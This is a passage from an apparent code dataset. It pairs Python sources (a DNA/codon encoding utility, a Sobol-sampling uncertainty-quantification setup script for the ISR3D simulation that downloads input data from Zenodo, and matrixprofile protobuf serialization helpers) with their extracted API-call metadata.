'current_maps'], {'delimiter': '""","""', 'fmt': '"""%f"""'}), "(outfile, current_maps, delimiter=',', fmt='%f')\n", (8719, 8767), True, 'import numpy as np\n'), ((8492, 8548), 'numpy.savetxt', 'np.savetxt', (['outfile', 'congestion'], {'delimiter': '""","""', 'fmt': '"""%f"""'}), "(outfile, congestion, delimiter=',', fmt='%f')\n", (8502, 8548), True, 'import numpy as np\n'), ((3821, 3869), 'numpy.zeros', 'np.zeros', (['(3 * size_region_x, 3 * size_region_y)'], {}), '((3 * size_region_x, 3 * size_region_y))\n', (3829, 3869), True, 'import numpy as np\n'), ((3894, 3910), 'numpy.zeros', 'np.zeros', (['(9)', 'int'], {}), '(9, int)\n', (3902, 3910), True, 'import numpy as np\n'), ((7097, 7216), 'simulated_annealer.simulated_annealer', 'simulated_annealer', (['init_state', 'T_init', 'T_final', 'alpha_temp', 'num_moves_per_step', 'current_region', 'congestion_enabled'], {}), '(init_state, T_init, T_final, alpha_temp,\n num_moves_per_step, current_region, congestion_enabled)\n', (7115, 7216), False, 'from simulated_annealer import simulated_annealer\n'), ((4001, 4021), 'random.uniform', 'random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (4015, 4021), False, 'import random\n')]
|
import numpy as np
class SequenceTools(object):
dna2gray_ = {'c': (0, 0), 't': (1, 0), 'g': (1, 1), 'a': (0, 1)}
gray2dna_ = {(0, 0): 'c', (1, 0): 't', (1, 1): 'g', (0, 1): 'a'}
codon2protein_ = {'ttt': 'f', 'ttc': 'f', 'tta': 'l', 'ttg': 'l', 'tct': 's', 'tcc': 's', 'tca': 's',
'tcg': 's', 'tat': 'y', 'tac': 'y', 'taa': '!', 'tag': '!', 'tgt': 'c', 'tgc': 'c',
'tga': '!', 'tgg': 'w', 'ctt': 'l', 'ctc': 'l', 'cta': 'l', 'ctg': 'l', 'cct': 'p',
'ccc': 'p', 'cca': 'p', 'ccg': 'p', 'cat': 'h', 'cac': 'h', 'caa': 'q', 'cag': 'q',
'cgt': 'r', 'cgc': 'r', 'cga': 'r', 'cgg': 'r', 'att': 'i', 'atc': 'i', 'ata': 'i',
'atg': 'm', 'act': 't', 'acc': 't', 'aca': 't', 'acg': 't', 'aat': 'n', 'aac': 'n',
'aaa': 'k', 'aag': 'k', 'agt': 's', 'agc': 's', 'aga': 'r', 'agg': 'r', 'gtt': 'v',
'gtc': 'v', 'gta': 'v', 'gtg': 'v', 'gct': 'a', 'gcc': 'a', 'gca': 'a', 'gcg': 'a',
'gat': 'd', 'gac': 'd', 'gaa': 'e', 'gag': 'e', 'ggt': 'g', 'ggc': 'g', 'gga': 'g',
'ggg': 'g'}
protein2codon_ = {
'l': ['tta', 'ttg', 'ctt', 'ctc', 'cta', 'ctg'],
's': ['tct', 'tcc', 'tca', 'tcg', 'agt', 'agc'],
'r': ['cgt', 'cgc', 'cga', 'cgg', 'aga', 'agg'],
'v': ['gtt', 'gtc', 'gta', 'gtg'],
'a': ['gct', 'gcc', 'gca', 'gcg'],
'p': ['cct', 'ccc', 'cca', 'ccg'],
't': ['act', 'acc', 'aca', 'acg'],
'g': ['ggt', 'ggc', 'gga', 'ggg'],
'stop': ['taa', 'tag', 'tga'],
'i': ['att', 'atc', 'ata'],
'y': ['tat', 'tac'],
'f': ['ttt', 'ttc'],
'c': ['tgt', 'tgc'],
'h': ['cat', 'cac'],
'q': ['caa', 'cag'],
'n': ['aat', 'aac'],
'k': ['aaa', 'aag'],
'd': ['gat', 'gac'],
'e': ['gaa', 'gag'],
'w': ['tgg'],
'm': ['atg']
}
protein2constraint_ = {
'l': {(1,): {('t',)}, (0, 2): {('t', 'a'), ('t', 'g'), ('c', 't'), ('c', 'c'), ('c', 'a'), ('c', 'g')}},
's': {(0, 1, 2): {('t', 'c', 't'), ('t', 'c', 'c'), ('t', 'c', 'a'), ('t', 'c', 'g'), ('a', 'g', 't'),
('a', 'g', 'c')}},
'r': {(1,): {('g',)}, (0, 2): {('c', 't'), ('c', 'c'), ('c', 'a'), ('c', 'g'), ('a', 'a'), ('a', 'g')}},
'v': {(0,): {('g',)}, (1,): {('t',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'a': {(0,): {('g',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'p': {(0,): {('c',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
't': {(0,): {('a',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'g': {(0,): {('g',)}, (1,): {('g',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'stop': {(0,): {('t',)}, (1, 2): {('a', 'a'), ('a', 'g'), ('g', 'a')}},
'i': {(0,): {('a',)}, (1,): {('t',)}, (2,): {('t',), ('a',), ('c',)}},
'y': {(0,): {('t',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'f': {(0,): {('t',)}, (1,): {('t',)}, (2,): {('t',), ('c',)}},
'c': {(0,): {('t',)}, (1,): {('g',)}, (2,): {('t',), ('c',)}},
'h': {(0,): {('c',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'q': {(0,): {('c',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'n': {(0,): {('a',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'k': {(0,): {('a',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'd': {(0,): {('g',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'e': {(0,): {('g',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'w': {(0,): {('t',)}, (1,): {('g',)}, (2,): {('g',)}},
'm': {(0,): {('a',)}, (1,): {('t',)}, (2,): {('g',)}},
}
# Integer mapping from Fernandes and Vinga (2016)
codon2idx_ = {'aaa': 1, 'aac': 2, 'aag': 3, 'aat': 4, 'aca': 5, 'acc': 6, 'acg': 7, 'act': 8, 'aga': 9,
'agc': 10, 'agg': 11, 'agt': 12, 'ata': 13, 'atc': 14, 'atg': 15, 'att': 16, 'caa': 17,
'cac': 18, 'cag': 19, 'cat': 20, 'cca': 21, 'ccc': 22, 'ccg': 23, 'cct': 24, 'cga': 25,
'cgc': 26, 'cgg': 27, 'cgt': 28, 'cta': 29, 'ctc': 30, 'ctg': 31, 'ctt': 32, 'gaa': 33,
'gac': 34, 'gag': 35, 'gat': 36, 'gca': 37, 'gcc': 38, 'gcg': 39, 'gct': 40, 'gga': 41,
'ggc': 42, 'ggg': 43, 'ggt': 44, 'gta': 45, 'gtc': 46, 'gtg': 47, 'gtt': 48, 'taa': 49,
'tac': 50, 'tag': 51, 'tat': 52, 'tca': 53, 'tcc': 54, 'tcg': 55, 'tct': 56, 'tga': 57,
'tgc': 58, 'tgg': 59, 'tgt': 60, 'tta': 61, 'ttc': 62, 'ttg': 63, 'ttt': 64}
@staticmethod
def convert_dna_to_rna(seq):
dna2rna = {'t': 'u', 'a': 'a', 'g': 'g', 'c': 'c'}
return "".join([dna2rna[s] for s in seq])
@staticmethod
def convert_dna_arr_to_str(dna_arr, base_order='ATCG'):
""" Convert N x 4 tokenized array into length N string """
dna_seq_str = ''
for i in range(dna_arr.shape[0]):
token = np.argmax(dna_arr[i, :])
dna_seq_str += base_order[token]
return dna_seq_str
@staticmethod
def get_aa_codons():
aa_list = sorted(list(SequenceTools.protein2codon_.keys()))
aa_codons = np.zeros((len(aa_list), 6, 3, 4))
i = 0
for aa in aa_list:
cods = SequenceTools.protein2codon_[aa]
j = 0
for c in cods:
cod_arr = SequenceTools.convert_dna_str_to_arr(c)
aa_codons[i, j] = cod_arr
j += 1
i += 1
return aa_codons
@staticmethod
def convert_dna_str_to_arr(dna_str, base_order='ATCG'):
""" Convert length N string into N x 4 tokenized array"""
dna_str = dna_str.upper()
N = len(dna_str)
dna_arr = np.zeros((N, 4))
for i in range(N):
idx = base_order.index(dna_str[i])
dna_arr[i, idx] = 1.
return dna_arr
@staticmethod
def convert_dna_arr_to_gray(dna_arr, base_order='ATCG'):
""" Convert N x 4 tokenized array into 2N x 2 tokenized gray code array"""
N = dna_arr.shape[0]
gray_arr = np.zeros((2 * N, 2))
for i in range(N):
token = np.argmax(dna_arr[i, :])
dna_i = base_order[token]
gray_i = SequenceTools.dna2gray_[dna_i]
for j in range(2):
gray_arr[2 * i + j, gray_i[j]] = 1
return gray_arr
@staticmethod
def convert_gray_to_dna_str(gray_arr):
Ngray = gray_arr.shape[0]
dna_str = ''
i = 0
while i < Ngray:
g1 = int(np.argmax(gray_arr[i, :]))
g2 = int(np.argmax(gray_arr[i + 1, :]))
dna_str += SequenceTools.gray2dna_[(g1, g2)]
i += 2
return dna_str
@staticmethod
def convert_dna_str_to_gray(dna_str):
"""Convert length N string into 2N x 2 tokenized gray code array"""
dna_str = dna_str.lower()
N = len(dna_str)
gray_arr = np.zeros((2 * N, 2))
for i in range(N):
gray_i = SequenceTools.dna2gray_[dna_str[i]]
for j in range(2):
gray_arr[2 * i + j, gray_i[j]] = 1
return gray_arr
@staticmethod
def convert_rna_to_dna(seq):
rna2dna = {'u': 't', 'a': 'a', 'g': 'g', 'c': 'c'}
return "".join([rna2dna[s] for s in seq])
@classmethod
def get_codon_from_idx(cls, idx):
idx2codon = {val: key for key, val in SequenceTools.codon2idx_.items()}
return idx2codon[idx]
@classmethod
def get_start_codon_int(cls):
return SequenceTools.codon2idx_['atg']
@classmethod
def get_stop_codon_ints(cls):
stop_codons = SequenceTools.protein2codon_['stop']
return [SequenceTools.codon2idx_[s] for s in stop_codons]
@classmethod
def translate_dna_str(cls, dna_seq):
dna_seq = dna_seq.lower()
prot_seq = []
i = 0
while i < len(dna_seq):
cod = dna_seq[i:i + 3]
prot_seq.append(SequenceTools.codon2protein_[cod])
i += 3
prot_seq = "".join(prot_seq)
return prot_seq
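# Illustrative usage sketch (hypothetical values; relies only on the methods above):
if __name__ == '__main__':
    dna = 'atggcttaa'
    arr = SequenceTools.convert_dna_str_to_arr(dna)           # (9, 4) one-hot array
    assert SequenceTools.convert_dna_arr_to_str(arr).lower() == dna
    print(SequenceTools.translate_dna_str(dna))               # -> 'ma!'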
|
[
"numpy.zeros",
"numpy.argmax"
] |
[((5834, 5850), 'numpy.zeros', 'np.zeros', (['(N, 4)'], {}), '((N, 4))\n', (5842, 5850), True, 'import numpy as np\n'), ((6192, 6212), 'numpy.zeros', 'np.zeros', (['(2 * N, 2)'], {}), '((2 * N, 2))\n', (6200, 6212), True, 'import numpy as np\n'), ((7051, 7071), 'numpy.zeros', 'np.zeros', (['(2 * N, 2)'], {}), '((2 * N, 2))\n', (7059, 7071), True, 'import numpy as np\n'), ((5036, 5060), 'numpy.argmax', 'np.argmax', (['dna_arr[i, :]'], {}), '(dna_arr[i, :])\n', (5045, 5060), True, 'import numpy as np\n'), ((6260, 6284), 'numpy.argmax', 'np.argmax', (['dna_arr[i, :]'], {}), '(dna_arr[i, :])\n', (6269, 6284), True, 'import numpy as np\n'), ((6658, 6683), 'numpy.argmax', 'np.argmax', (['gray_arr[i, :]'], {}), '(gray_arr[i, :])\n', (6667, 6683), True, 'import numpy as np\n'), ((6706, 6735), 'numpy.argmax', 'np.argmax', (['gray_arr[i + 1, :]'], {}), '(gray_arr[i + 1, :])\n', (6715, 6735), True, 'import numpy as np\n')]
|
import importlib
import subprocess
lib_list = ['numpy','ymmsl','sobol_seq','csv','seaborn','zenodo_get']
for lib_name in lib_list:
    try:
        # Import each dependency by name; a literal "import lib_name" would
        # always fail and needlessly trigger the pip install branch below.
        importlib.import_module(lib_name)
except ImportError:
if lib_name == 'csv':
print(lib_name,' Module not installed')
subprocess.run(['pip','install','python-csv'])
else:
print(lib_name,' Module not installed')
subprocess.run(['pip','install','%s'%lib_name])
import numpy as np
import ymmsl
import sobol_seq
import csv
import os
import seaborn as sns
import zenodo_get
# Transform the normalized sample matrix to ranges of uncertain parameters
def dim_transform(sobol_vector,uncertain_list):
dim = len(uncertain_list)
for num_dim in range(dim):
para_max = uncertain_list[num_dim].get('max')
para_min = uncertain_list[num_dim].get('min')
sobol_vector[:,num_dim] = para_min + (para_max-para_min)*sobol_vector[:,num_dim]
return sobol_vector
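# For example, dim_transform(np.array([[0.0, 0.5], [1.0, 0.25]]),
# [{'min': 10.0, 'max': 20.0}, {'min': 0.5, 'max': 1.5}])
# rescales each column from [0, 1] onto its parameter range,
# giving [[10.0, 1.0], [20.0, 0.75]].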
####################################################################################
##### Sample generation and UQ campaign creation (including instances folder)#######
####################################################################################
# Note:
# This is used to generate UQ samples for only four biological parameters:
# 1) Endothelium endpoint 2) smc max strain 3) balloon extension 4) Fenestration probability
# Naming of Folder and files for samples
# Level 0: UQtest (UQ campaign name)
# Level 1: UQtest/A (sample matrix of sobol sequence)
# Level 2: UQtest/A/A_X where X vary from 1 -> N (N: number of samples)
# Level 3: UQtest/A/A_X/input.ymmsl
### Main function
# Number of samples for UQ
# Note that ISR3D is a computationally intensive application.
# Running 128 instances would need some cluster resources
# You can start with a small number, 16 for instances.
NumSample = 128
# Template path to the ymmsl file (relative path from ISR3D/Result/UQtest/ to ISR3D/UQ/template/input_stage4.ymmsl)
input_path = '../../UQ/template/'
input_ymmsl_filename = 'input_stage4.ymmsl'
# Output directory and name for the UQ campaign folder
output_path = './'
experiment_name = 'UQtest'
# Read in the data of template ymmsl file
with open(input_path+input_ymmsl_filename,'r') as f:
ymmsl_data = ymmsl.load(f)
# Take out the unchanged model part and need-for-change settings part for ymmsl model
model = ymmsl_data.model
settings = ymmsl_data.settings
# Set uncertain parameters and its ranges as a list
ymmsl_uncertain_parameters = [
{
'name': 'smc.endo_endpoint',
'min': 10.0,
'max': 20.0
},
{
'name': 'smc.balloon_extension',
'min': 0.5,
'max': 1.5
},
{
'name': 'smc.smc_max_strain',
'min': 1.2,
'max': 1.8
},
{
'name': 'smc.fenestration_probability',
'min': 0.0,# Calculate the lumen volume from (lumen_area_of_each_slice*depth_of_slice)
'max': 0.1
}]
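# Each entry above defines the [min, max] interval that the corresponding column
# of the Sobol sample matrix is rescaled onto by dim_transform().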
# Count the total uncertain input dimensions (here 4 parameters)
num_uncer_para = len(ymmsl_uncertain_parameters)
print('Number of uncertain parameter: '+str(num_uncer_para))
# Generate a Sobol sample matrix in (0,1), transform it to the (min,max) ranges and save it
A = sobol_seq.i4_sobol_generate(num_uncer_para,NumSample)
A = dim_transform(A,ymmsl_uncertain_parameters)
np.savetxt("A.csv",A)
# Create corresponding directory and folders
try:
os.mkdir(output_path+experiment_name)
except OSError:
print ("Creation of the directory %s failed" % output_path+experiment_name)
else:
print ("Successfully created the directory %s" % output_path+experiment_name)
# A: Replace the corresponding value within the dict and output the file
os.mkdir(output_path+experiment_name+'/A')
checklist = ['A']
for n in range(NumSample):
sample_path = output_path+experiment_name+'/A'+'/A_'+str(n)
os.mkdir(sample_path)
# Generate file for ymmsl
num_para = 0
for para in ymmsl_uncertain_parameters:
settings[para.get('name')] = float(A[n,num_para])
num_para = num_para + 1
config = ymmsl.Configuration(model, settings, None, None)
with open(sample_path+'/input_stage4.ymmsl', 'w') as f:
ymmsl.save(config, f)
print('ymmsl input for each UQ instance has been generated')
####################################################################################
##### Run shell script to broadcast other input files to each sample folder#########
####################################################################################
import subprocess
# Download Other input files from Zenodo
print('Start to download other input files for ISR3D from Zenodo')
subprocess.run(['wget https://zenodo.org/record/4603912/files/stage3.test_vessel.dat'],shell = True)
subprocess.run(['wget https://zenodo.org/record/4603912/files/stage3.test_vessel_nb.dat'],shell = True)
subprocess.run(['wget https://zenodo.org/record/4603912/files/test_vessel_centerline.csv'],shell = True)
print('Start to broadcast the input to each UQ instance directory')
# Template path to the ymmsl file (relative path from ISR3D/Result/UQtest/ to ISR3D/UQ/function/BCastStage3.sh)
pass_arg = str(NumSample)
subprocess.run(['bash','../../UQ/function/BCastStage3.sh', '%s'%pass_arg])
print('Sample generation done')
|
[
"ymmsl.load",
"ymmsl.save",
"ymmsl.Configuration",
"subprocess.run",
"os.mkdir",
"numpy.savetxt",
"sobol_seq.i4_sobol_generate"
] |
[((3344, 3398), 'sobol_seq.i4_sobol_generate', 'sobol_seq.i4_sobol_generate', (['num_uncer_para', 'NumSample'], {}), '(num_uncer_para, NumSample)\n', (3371, 3398), False, 'import sobol_seq\n'), ((3446, 3468), 'numpy.savetxt', 'np.savetxt', (['"""A.csv"""', 'A'], {}), "('A.csv', A)\n", (3456, 3468), True, 'import numpy as np\n'), ((3820, 3866), 'os.mkdir', 'os.mkdir', (["(output_path + experiment_name + '/A')"], {}), "(output_path + experiment_name + '/A')\n", (3828, 3866), False, 'import os\n'), ((4791, 4899), 'subprocess.run', 'subprocess.run', (["['wget https://zenodo.org/record/4603912/files/stage3.test_vessel.dat']"], {'shell': '(True)'}), "([\n 'wget https://zenodo.org/record/4603912/files/stage3.test_vessel.dat'],\n shell=True)\n", (4805, 4899), False, 'import subprocess\n'), ((4892, 5004), 'subprocess.run', 'subprocess.run', (["['wget https://zenodo.org/record/4603912/files/stage3.test_vessel_nb.dat']"], {'shell': '(True)'}), "([\n 'wget https://zenodo.org/record/4603912/files/stage3.test_vessel_nb.dat'\n ], shell=True)\n", (4906, 5004), False, 'import subprocess\n'), ((4996, 5109), 'subprocess.run', 'subprocess.run', (["['wget https://zenodo.org/record/4603912/files/test_vessel_centerline.csv']"], {'shell': '(True)'}), "([\n 'wget https://zenodo.org/record/4603912/files/test_vessel_centerline.csv'\n ], shell=True)\n", (5010, 5109), False, 'import subprocess\n'), ((5307, 5384), 'subprocess.run', 'subprocess.run', (["['bash', '../../UQ/function/BCastStage3.sh', '%s' % pass_arg]"], {}), "(['bash', '../../UQ/function/BCastStage3.sh', '%s' % pass_arg])\n", (5321, 5384), False, 'import subprocess\n'), ((2312, 2325), 'ymmsl.load', 'ymmsl.load', (['f'], {}), '(f)\n', (2322, 2325), False, 'import ymmsl\n'), ((3523, 3562), 'os.mkdir', 'os.mkdir', (['(output_path + experiment_name)'], {}), '(output_path + experiment_name)\n', (3531, 3562), False, 'import os\n'), ((3977, 3998), 'os.mkdir', 'os.mkdir', (['sample_path'], {}), '(sample_path)\n', (3985, 3998), False, 'import os\n'), ((4208, 4256), 'ymmsl.Configuration', 'ymmsl.Configuration', (['model', 'settings', 'None', 'None'], {}), '(model, settings, None, None)\n', (4227, 4256), False, 'import ymmsl\n'), ((4325, 4346), 'ymmsl.save', 'ymmsl.save', (['config', 'f'], {}), '(config, f)\n', (4335, 4346), False, 'import ymmsl\n'), ((229, 277), 'subprocess.run', 'subprocess.run', (["['pip', 'install', 'python-csv']"], {}), "(['pip', 'install', 'python-csv'])\n", (243, 277), False, 'import subprocess\n'), ((331, 382), 'subprocess.run', 'subprocess.run', (["['pip', 'install', '%s' % lib_name]"], {}), "(['pip', 'install', '%s' % lib_name])\n", (345, 382), False, 'import subprocess\n')]
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
range = getattr(__builtins__, 'xrange', range)
# end of py2 compatibility boilerplate
import numpy as np
from matrixprofile import core
from matrixprofile.io.protobuf.proto_messages_pb2 import (
Location, Motif, MPFOutput
)
def get_matrix_attributes(matrix):
"""
Utility function to extract the rows, cols and flattened array from a
numpy array so it can be stored in the MPFOutput protobuf message.
Parameters
----------
matrix : np.ndarray
The numpy array to extract the attributes from.
Returns
-------
tuple :
A tuple containing the rows, cols and flattened array.
"""
if not core.is_array_like(matrix) or len(matrix) < 1:
return None, None, None
rows = matrix.shape[0]
cols = 0
if len(matrix.shape) > 1:
cols = matrix.shape[1]
return rows, cols, matrix.flatten()
def get_windows(profile):
"""
Utility function to format the windows from a profile structure ensuring
that the windows are in an array.
Parameters
----------
profile : dict
The MatrixProfile or PMP profile.
Returns
-------
list :
The window(s) in a list.
"""
windows = []
if core.is_mp_obj(profile):
windows.append(profile.get('w'))
elif core.is_pmp_obj(profile):
windows = profile.get('windows')
return windows
def get_proto_motif(motif):
"""
Utility function to convert a motif from a MatrixProfile or PMP structure
ensuring that it is compatible with the MPFOutput message.
Note
----
A single dimensional motif location will only have a row index and
a column index of 0.
Parameters
----------
motif : dict
The motif to convert.
Returns
-------
Motif :
The motif object for MPFOutput message.
"""
out_motif = Motif()
for indices in motif['motifs']:
tmp = Location()
tmp.row = 0
tmp.col = 0
# handle single integer location
if core.is_array_like(indices):
tmp.row = indices[0]
tmp.col = indices[1]
else:
tmp.row = indices
out_motif.motifs.append(tmp)
for neighbor in motif['neighbors']:
tmp = Location()
tmp.row = 0
tmp.col = 0
# handle single integer location
if core.is_array_like(neighbor):
tmp.row = neighbor[0]
tmp.col = neighbor[1]
else:
tmp.row = neighbor
out_motif.neighbors.append(tmp)
return out_motif
def get_proto_discord(discord):
"""
Utility function to convert a discord into the MPFOutput message
format.
Note
----
A single dimensional discord location will only have a row index and
a column index of 0.
Parameters
----------
discord : int or tuple
The discord with row, col index or single index.
Returns
-------
Location :
The Location message used in the MPFOutput protobuf message.
"""
out_discord = Location()
out_discord.row = 0
out_discord.col = 0
if core.is_array_like(discord):
out_discord.row = discord[0]
out_discord.col = discord[1]
else:
out_discord.row = discord
return out_discord
def profile_to_proto(profile):
"""
Utility function that takes a MatrixProfile or PMP profile data structure
and converts it to the MPFOutput protobuf message object.
Parameters
----------
profile : dict
The profile to convert.
Returns
-------
MPFOutput :
The MPFOutput protobuf message object.
"""
output = MPFOutput()
# add higher level attributes that work for PMP and MP
output.klass = profile.get('class')
output.algorithm = profile.get('algorithm')
output.metric = profile.get('metric')
output.sample_pct = profile.get('sample_pct')
# add time series data
ts = profile.get('data').get('ts')
query = profile.get('data').get('query')
rows, cols, data = get_matrix_attributes(ts)
output.ts.rows = rows
output.ts.cols = cols
output.ts.data.extend(data)
# add query data
query = profile.get('data').get('query')
rows, cols, data = get_matrix_attributes(query)
if rows and cols and core.is_array_like(data):
output.query.rows = rows
output.query.cols = cols
output.query.data.extend(data)
# add window(s)
output.windows.extend(get_windows(profile))
# add motifs
motifs = profile.get('motifs')
if not isinstance(motifs, type(None)):
for motif in motifs:
output.motifs.append(get_proto_motif(motif))
# add discords
discords = profile.get('discords')
if not isinstance(discords, type(None)):
for discord in discords:
output.discords.append(get_proto_discord(discord))
# add cmp
cmp = profile.get('cmp')
if not isinstance(cmp, type(None)):
rows, cols, data = get_matrix_attributes(cmp)
output.cmp.rows = rows
output.cmp.cols = cols
output.cmp.data.extend(data)
# add av
av = profile.get('av')
if not isinstance(av, type(None)):
rows, cols, data = get_matrix_attributes(av)
output.av.rows = rows
output.av.cols = cols
output.av.data.extend(data)
# add av_type
av_type = profile.get('av_type')
if not isinstance(av_type, type(None)) and len(av_type) > 0:
output.av_type = av_type
# add the matrix profile specific attributes
if core.is_mp_obj(profile):
output.mp.ez = profile.get('ez')
output.mp.join = profile.get('join')
# add mp
rows, cols, data = get_matrix_attributes(profile.get('mp'))
output.mp.mp.rows = rows
output.mp.mp.cols = cols
output.mp.mp.data.extend(data)
# add pi
rows, cols, data = get_matrix_attributes(profile.get('pi'))
output.mp.pi.rows = rows
output.mp.pi.cols = cols
output.mp.pi.data.extend(data)
# add lmp
rows, cols, data = get_matrix_attributes(profile.get('lmp'))
if rows and cols and core.is_array_like(data):
output.mp.lmp.rows = rows
output.mp.lmp.cols = cols
output.mp.lmp.data.extend(data)
# add lpi
rows, cols, data = get_matrix_attributes(profile.get('lpi'))
if rows and cols and core.is_array_like(data):
output.mp.lpi.rows = rows
output.mp.lpi.cols = cols
output.mp.lpi.data.extend(data)
# add rmp
rows, cols, data = get_matrix_attributes(profile.get('rmp'))
if rows and cols and core.is_array_like(data):
output.mp.rmp.rows = rows
output.mp.rmp.cols = cols
output.mp.rmp.data.extend(data)
# add rpi
rows, cols, data = get_matrix_attributes(profile.get('rpi'))
if rows and cols and core.is_array_like(data):
output.mp.rpi.rows = rows
output.mp.rpi.cols = cols
output.mp.rpi.data.extend(data)
# add the pan matrix profile specific attributes
elif core.is_pmp_obj(profile):
# add pmp
rows, cols, data = get_matrix_attributes(profile.get('pmp'))
output.pmp.pmp.rows = rows
output.pmp.pmp.cols = cols
output.pmp.pmp.data.extend(data)
# add pmpi
rows, cols, data = get_matrix_attributes(profile.get('pmpi'))
output.pmp.pmpi.rows = rows
output.pmp.pmpi.cols = cols
output.pmp.pmpi.data.extend(data)
else:
raise ValueError('Expecting Pan-MatrixProfile or MatrixProfile!')
return output
def to_mpf(profile):
"""
Converts a given profile object into MPF binary file format.
Parameters
----------
profile : dict_like
A MatrixProfile or Pan-MatrixProfile data structure.
Returns
-------
str :
The profile as a binary formatted string.
"""
obj = profile_to_proto(profile)
return obj.SerializeToString()
def from_proto_to_array(value):
"""
Utility function to convert a protobuf array back into the correct
dimensions.
Parameters
----------
value : array_like
The array to transform.
Returns
-------
np.ndarray :
The transformed array.
"""
if isinstance(value, type(None)) or len(value.data) < 1:
return None
shape = (value.rows, value.cols)
out = np.array(value.data)
if shape[1] > 0:
out = out.reshape(shape)
return out
def discords_from_proto(discords, is_one_dimensional=False):
"""
Utility function to transform discord locations back to single dimension
or multi-dimension location.
Parameter
---------
discords : array_like
The protobuf formatted array.
is_one_dimensional : boolean
A flag to indicate if the original locations should be 1D.
Returns
-------
np.ndarray :
The transformed discord locations.
"""
out = []
for discord in discords:
if is_one_dimensional:
out.append(discord.row)
else:
out.append((discord.row, discord.col))
return np.array(out, dtype=int)
def motifs_from_proto(motifs, is_one_dimensional=False):
"""
Utility function to transform motif locations back to single dimension
or multi-dimension location.
Parameter
---------
motifs : array_like
The protobuf formatted array.
is_one_dimensional : boolean
A flag to indicate if the original locations should be 1D.
Returns
-------
list :
The transformed motif locations.
"""
out = []
for motif in motifs:
tmp = {'motifs': [], 'neighbors': []}
for location in motif.motifs:
if is_one_dimensional:
tmp['motifs'].append(location.row)
else:
tmp['motifs'].append((location.row, location.col))
for neighbor in motif.neighbors:
if is_one_dimensional:
tmp['neighbors'].append(neighbor.row)
else:
tmp['neighbors'].append((neighbor.row, neighbor.col))
out.append(tmp)
return out
def from_mpf(profile):
"""
Converts binary formatted MPFOutput message into a profile data structure.
Parameters
----------
profile : str
The profile as a binary formatted MPFOutput message.
Returns
-------
profile : dict_like
A MatrixProfile or Pan-MatrixProfile data structure.
"""
obj = MPFOutput()
obj.ParseFromString(profile)
out = {}
is_one_dimensional = False
# load in all higher level attributes
out['class'] = obj.klass
out['algorithm'] = obj.algorithm
out['metric'] = obj.metric
out['sample_pct'] = obj.sample_pct
out['data'] = {
'ts': from_proto_to_array(obj.ts),
'query': from_proto_to_array(obj.query)
}
if obj.klass == 'MatrixProfile':
out['mp'] = from_proto_to_array(obj.mp.mp)
out['pi'] = from_proto_to_array(obj.mp.pi)
out['lmp'] = from_proto_to_array(obj.mp.lmp)
out['lpi'] = from_proto_to_array(obj.mp.lpi)
out['rmp'] = from_proto_to_array(obj.mp.rmp)
out['rpi'] = from_proto_to_array(obj.mp.rpi)
out['ez'] = obj.mp.ez
out['join'] = obj.mp.join
out['w'] = obj.windows[0]
is_one_dimensional = len(out['mp'].shape) == 1
elif obj.klass == 'PMP':
out['pmp'] = from_proto_to_array(obj.pmp.pmp)
out['pmpi'] = from_proto_to_array(obj.pmp.pmpi)
out['windows'] = np.array(obj.windows)
if not isinstance(obj.discords, type(None)) and len(obj.discords) > 0:
out['discords'] = discords_from_proto(
obj.discords, is_one_dimensional=is_one_dimensional)
if not isinstance(obj.motifs, type(None)) and len(obj.motifs) > 0:
out['motifs'] = motifs_from_proto(
obj.motifs, is_one_dimensional=is_one_dimensional)
if not isinstance(obj.cmp, type(None)) and len(obj.cmp.data) > 0:
out['cmp'] = from_proto_to_array(obj.cmp)
if not isinstance(obj.av, type(None)) and len(obj.av.data) > 0:
out['av'] = from_proto_to_array(obj.av)
if not isinstance(obj.av_type, type(None)) and len(obj.av_type) > 0:
out['av_type'] = obj.av_type
return out
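# Illustrative round trip (a sketch; assumes `profile` is a MatrixProfile or PMP
# dict, e.g. as returned by matrixprofile.compute()):
#
# data = to_mpf(profile) # serialize to the MPF binary format
# restored = from_mpf(data) # parse the bytes back into a profile dict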
|
[
"matrixprofile.core.is_array_like",
"matrixprofile.io.protobuf.proto_messages_pb2.Location",
"matrixprofile.core.is_pmp_obj",
"numpy.array",
"matrixprofile.io.protobuf.proto_messages_pb2.Motif",
"matrixprofile.core.is_mp_obj",
"matrixprofile.io.protobuf.proto_messages_pb2.MPFOutput"
] |
[((1392, 1415), 'matrixprofile.core.is_mp_obj', 'core.is_mp_obj', (['profile'], {}), '(profile)\n', (1406, 1415), False, 'from matrixprofile import core\n'), ((2035, 2042), 'matrixprofile.io.protobuf.proto_messages_pb2.Motif', 'Motif', ([], {}), '()\n', (2040, 2042), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((3230, 3240), 'matrixprofile.io.protobuf.proto_messages_pb2.Location', 'Location', ([], {}), '()\n', (3238, 3240), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((3297, 3324), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['discord'], {}), '(discord)\n', (3315, 3324), False, 'from matrixprofile import core\n'), ((3840, 3851), 'matrixprofile.io.protobuf.proto_messages_pb2.MPFOutput', 'MPFOutput', ([], {}), '()\n', (3849, 3851), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((5743, 5766), 'matrixprofile.core.is_mp_obj', 'core.is_mp_obj', (['profile'], {}), '(profile)\n', (5757, 5766), False, 'from matrixprofile import core\n'), ((8684, 8704), 'numpy.array', 'np.array', (['value.data'], {}), '(value.data)\n', (8692, 8704), True, 'import numpy as np\n'), ((9430, 9454), 'numpy.array', 'np.array', 